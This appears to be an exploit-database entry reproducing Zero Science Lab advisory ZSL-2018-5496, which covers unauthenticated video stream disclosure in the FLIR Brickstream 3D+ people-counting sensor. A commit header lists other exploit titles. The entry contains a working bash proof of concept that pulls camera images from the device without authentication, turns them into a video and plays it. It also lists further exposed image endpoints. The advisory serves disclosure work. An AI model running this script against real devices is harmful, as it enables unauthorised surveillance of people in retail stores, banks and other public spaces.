731dd0f423
22 changes to exploits/shellcodes Snes9K 0.0.9z - Buffer Overflow (SEH) NoMachine < 5.3.27 - Remote Code Execution MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection FLIR Brickstream 3D+ - RTSP Stream Disclosure FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure CAMALEON CMS 2.4 - Cross-Site Scripting Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin) AlchemyCMS 4.1 - Cross-Site Scripting FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution College Notes Management System 1.0 - 'user' SQL Injection Advanced HRM 1.6 - Remote Code Execution Centos Web Panel 0.9.8.480 - Multiple Vulnerabilities Academic Timetable Final Build 7.0 - Information Disclosure KORA 2.7.0 - 'cid' SQL Injection
63 lines
No EOL
1.7 KiB
Text
63 lines
No EOL
1.7 KiB
Text
FLIR Systems FLIR Brickstream 3D+ Unauthenticated RTSP Stream Disclosure
|
|
|
|
|
|
Vendor: FLIR Systems, Inc.
|
|
Product web page: http://www.brickstream.com
|
|
Affected version: Firmware: 2.1.742.1842
|
|
Api: 1.0.0
|
|
Node: 0.10.33
|
|
Onvif: 0.1.1.47
|
|
|
|
Summary: The Brickstream line of sensors provides highly accurate, anonymous
|
|
information about how people move into, around, and out of physical places.
|
|
These smart devices are installed overhead inside retail stores, malls, banks,
|
|
stadiums, transportation terminals and other brick-and-mortar locations to
|
|
measure people's behaviors within the space.
|
|
|
|
Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated and
|
|
unauthorized live RTSP video stream access.
|
|
|
|
Tested on: Titan
|
|
Api/1.0.0
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2018-5496
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5496.php
|
|
|
|
|
|
26.07.2018
|
|
|
|
--
|
|
|
|
|
|
#!/bin/bash
|
|
#
|
|
# PoC:
|
|
#
|
|
|
|
echo 'Fetching some images...'
|
|
for x in {1..10};
|
|
do curl http://192.168.2.1:8083/middleImage.jpg -o sequence-$x.jpg -#;
|
|
done
|
|
echo 'Done.'
|
|
sleep 2
|
|
echo 'Generating video...'
|
|
sleep 2
|
|
ffmpeg -r 1 -i sequence-%01d.jpg -c:v libx264 -vf fps=60 -pix_fmt yuv444p counted_people.mp4
|
|
echo 'Running generated video...'
|
|
sleep 2
|
|
vlc counted_people.mp4
|
|
|
|
#
|
|
# http://192.168.2.1:8083/middleImage.jpg
|
|
# http://192.168.2.1:8083/rightimage.jpg
|
|
# http://192.168.2.1:8083/leftimage.jpg
|
|
# http://192.168.2.1:8083/threeDimage.jpg
|
|
# http://192.168.2.1:8083/startStopTrafficMapImage.jpg
|
|
# http://192.168.2.1:8083/dwellTrafficMapImage.jpg
|
|
# http://192.168.2.1:8083/heightTrafficMapImage.jpg
|
|
# |